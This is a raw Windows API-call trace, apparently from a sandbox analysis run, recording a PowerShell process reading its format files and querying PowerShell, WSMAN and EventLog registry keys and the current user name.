	[0606.275] ReadFile (in: hFile=0x310, lpBuffer=0x3585508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3585508*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0606.275] ReadFile (in: hFile=0x310, lpBuffer=0x3585508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3585508*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0606.275] ReadFile (in: hFile=0x310, lpBuffer=0x3585508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3585508*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0606.276] ReadFile (in: hFile=0x310, lpBuffer=0x3585508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3585508*, lpNumberOfBytesRead=0x28d438*=0xe98, lpOverlapped=0x0) returned 1
	[0606.276] ReadFile (in: hFile=0x310, lpBuffer=0x3584b08, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3584b08*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0606.276] ReadFile (in: hFile=0x310, lpBuffer=0x3585508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3585508*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0606.276] CloseHandle (hObject=0x310) returned 1
	[0606.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0606.276] SetErrorMode (uMode=0x1) returned 0x1
	[0606.276] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d3e0 | out: lpFileInformation=0x28d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0606.277] SetErrorMode (uMode=0x1) returned 0x1
	[0606.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0606.277] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d4c8 | out: phkResult=0x28d4c8*=0x310) returned 0x0
	[0606.277] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d44c, lpData=0x0, lpcbData=0x28d448*=0x0 | out: lpType=0x28d44c*=0x1, lpData=0x0, lpcbData=0x28d448*=0x56) returned 0x0
	[0606.277] CoTaskMemAlloc (cb=0x5a) returned 0x49b830
	[0606.277] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d41c, lpData=0x49b830, lpcbData=0x28d418*=0x56 | out: lpType=0x28d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d418*=0x56) returned 0x0
	[0606.277] CoTaskMemFree (pv=0x49b830) 
	[0606.277] RegCloseKey (hKey=0x310) returned 0x0
	[0606.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0606.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0606.278] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x53e1ad5, Data2=0xf62c, Data3=0x4e94, Data4=([0]=0x84, [1]=0x4b, [2]=0x2c, [3]=0x85, [4]=0x46, [5]=0x8c, [6]=0xa6, [7]=0xbd))) returned 0x0
	[0606.278] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x8e8961fd, Data2=0x9d3e, Data3=0x4df1, Data4=([0]=0x94, [1]=0xc0, [2]=0x61, [3]=0xc0, [4]=0x25, [5]=0x4c, [6]=0xd8, [7]=0xf6))) returned 0x0
	[0606.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0606.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0607.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0607.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0607.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0607.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.384] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0609.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.384] CoTaskMemFree (pv=0x49d030) 
	[0609.386] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0609.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.386] CoTaskMemFree (pv=0x49d030) 
	[0609.387] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0609.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.388] CoTaskMemFree (pv=0x49d030) 
	[0609.389] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0609.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.389] CoTaskMemFree (pv=0x49d030) 
	[0609.402] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0609.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.403] CoTaskMemFree (pv=0x49d030) 
	[0609.408] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0609.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.409] CoTaskMemFree (pv=0x49d030) 
	[0609.409] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0609.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.409] CoTaskMemFree (pv=0x49d030) 
	[0609.415] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6d8 | out: phkResult=0x28d6d8*=0x310) returned 0x0
	[0610.418] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d5dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d5d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d5dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d5d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0610.418] CoTaskMemFree (pv=0x0) 
	[0610.419] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0610.419] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x419ce0, lpcchValueName=0x28d688, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x28d688, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0610.419] CoTaskMemFree (pv=0x419ce0) 
	[0610.419] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0610.420] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x419ce0, lpcchValueName=0x28d688, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x28d688, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0610.420] CoTaskMemFree (pv=0x419ce0) 
	[0610.420] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0610.420] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x419ce0, lpcchValueName=0x28d688, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x28d688, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0610.420] CoTaskMemFree (pv=0x419ce0) 
	[0610.421] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d66c, lpData=0x0, lpcbData=0x28d668*=0x0 | out: lpType=0x28d66c*=0x1, lpData=0x0, lpcbData=0x28d668*=0x8) returned 0x0
	[0610.421] CoTaskMemAlloc (cb=0xc) returned 0x1b8d3730
	[0610.421] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d63c, lpData=0x1b8d3730, lpcbData=0x28d638*=0x8 | out: lpType=0x28d63c*=0x1, lpData="2.0", lpcbData=0x28d638*=0x8) returned 0x0
	[0610.421] CoTaskMemFree (pv=0x1b8d3730) 
	[0612.318] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d628 | out: phkResult=0x28d628*=0x310) returned 0x0
	[0612.318] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d52c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d528, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d52c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d528*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.319] CoTaskMemFree (pv=0x0) 
	[0612.319] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0612.319] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x419ce0, lpcchValueName=0x28d5d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x28d5d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0612.320] CoTaskMemFree (pv=0x419ce0) 
	[0612.320] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0612.320] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x419ce0, lpcchValueName=0x28d5d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x28d5d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0612.320] CoTaskMemFree (pv=0x419ce0) 
	[0612.320] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0612.321] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x419ce0, lpcchValueName=0x28d5d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x28d5d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0612.321] CoTaskMemFree (pv=0x419ce0) 
	[0612.321] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d5bc, lpData=0x0, lpcbData=0x28d5b8*=0x0 | out: lpType=0x28d5bc*=0x1, lpData=0x0, lpcbData=0x28d5b8*=0x8) returned 0x0
	[0612.321] CoTaskMemAlloc (cb=0xc) returned 0x1b8d35d0
	[0612.321] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d58c, lpData=0x1b8d35d0, lpcbData=0x28d588*=0x8 | out: lpType=0x28d58c*=0x1, lpData="2.0", lpcbData=0x28d588*=0x8) returned 0x0
	[0612.322] CoTaskMemFree (pv=0x1b8d35d0) 
	[0612.327] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0612.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0612.327] CoTaskMemFree (pv=0x49d030) 
	[0612.340] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0612.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0612.340] CoTaskMemFree (pv=0x49d030) 
	[0613.423] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d658 | out: phkResult=0x28d658*=0x314) returned 0x0
	[0613.429] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d5cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d5c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d5cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d5c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0613.430] CoTaskMemFree (pv=0x0) 
	[0613.430] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0613.431] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x0, lpName=0x419ce0, lpcchName=0x28d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0613.431] CoTaskMemFree (pv=0x419ce0) 
	[0613.431] CoTaskMemFree (pv=0x0) 
	[0613.431] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0613.431] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x1, lpName=0x419ce0, lpcchName=0x28d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0613.431] CoTaskMemFree (pv=0x419ce0) 
	[0613.431] CoTaskMemFree (pv=0x0) 
	[0613.431] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0613.431] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x2, lpName=0x419ce0, lpcchName=0x28d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0613.431] CoTaskMemFree (pv=0x419ce0) 
	[0613.431] CoTaskMemFree (pv=0x0) 
	[0613.431] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0613.431] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x3, lpName=0x419ce0, lpcchName=0x28d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0613.431] CoTaskMemFree (pv=0x419ce0) 
	[0613.431] CoTaskMemFree (pv=0x0) 
	[0613.431] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0613.431] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x4, lpName=0x419ce0, lpcchName=0x28d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0613.432] CoTaskMemFree (pv=0x419ce0) 
	[0613.432] CoTaskMemFree (pv=0x0) 
	[0613.432] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0613.432] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x5, lpName=0x419ce0, lpcchName=0x28d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0613.432] CoTaskMemFree (pv=0x419ce0) 
	[0613.432] CoTaskMemFree (pv=0x0) 
	[0613.432] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0613.432] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x6, lpName=0x419ce0, lpcchName=0x28d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0613.432] CoTaskMemFree (pv=0x419ce0) 
	[0613.432] CoTaskMemFree (pv=0x0) 
	[0613.432] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0613.432] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x7, lpName=0x419ce0, lpcchName=0x28d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0613.432] CoTaskMemFree (pv=0x419ce0) 
	[0613.432] CoTaskMemFree (pv=0x0) 
	[0613.432] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0613.432] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x8, lpName=0x419ce0, lpcchName=0x28d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0613.433] CoTaskMemFree (pv=0x419ce0) 
	[0613.433] CoTaskMemFree (pv=0x0) 
	[0613.433] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x334) returned 0x0
	[0613.433] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x0) returned 0x2
	[0613.433] RegOpenKeyExW (in: hKey=0x314, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x30c) returned 0x0
	[0613.433] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x0) returned 0x2
	[0613.433] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x1d0) returned 0x0
	[0613.433] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x0) returned 0x2
	[0613.433] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x1d8) returned 0x0
	[0613.434] RegOpenKeyExW (in: hKey=0x1d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x0) returned 0x2
	[0613.434] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x328) returned 0x0
	[0613.434] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x0) returned 0x2
	[0613.434] RegOpenKeyExW (in: hKey=0x314, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x33c) returned 0x0
	[0613.434] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x0) returned 0x2
	[0613.434] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x340) returned 0x0
	[0613.434] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x0) returned 0x2
	[0613.434] RegOpenKeyExW (in: hKey=0x314, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x344) returned 0x0
	[0613.435] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x0) returned 0x2
	[0613.435] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x348) returned 0x0
	[0613.435] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6b8 | out: phkResult=0x28d6b8*=0x34c) returned 0x0
	[0613.435] RegCloseKey (hKey=0x34c) returned 0x0
	[0613.435] RegCloseKey (hKey=0x314) returned 0x0
	[0613.436] RegCloseKey (hKey=0x348) returned 0x0
	[0614.459] CoTaskMemAlloc (cb=0x804) returned 0x1b901270
	[0614.460] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b901270, nSize=0x28d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d8c8) returned 0x1
	[0614.461] CoTaskMemFree (pv=0x1b901270) 
	[0614.462] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0614.462] GetUserNameW (in: lpBuffer=0x419ce0, pcbBuffer=0x28d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d908) returned 1
	[0614.462] CoTaskMemFree (pv=0x419ce0) 
	[0616.126] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d608 | out: phkResult=0x28d608*=0x350) returned 0x0
	[0616.127] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d57c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d578, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d57c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d578*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.127] CoTaskMemFree (pv=0x0) 
	[0616.127] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.127] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.127] CoTaskMemFree (pv=0x419ce0) 
	[0616.127] CoTaskMemFree (pv=0x0) 
	[0616.127] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.127] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.127] CoTaskMemFree (pv=0x419ce0) 
	[0616.127] CoTaskMemFree (pv=0x0) 
	[0616.127] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
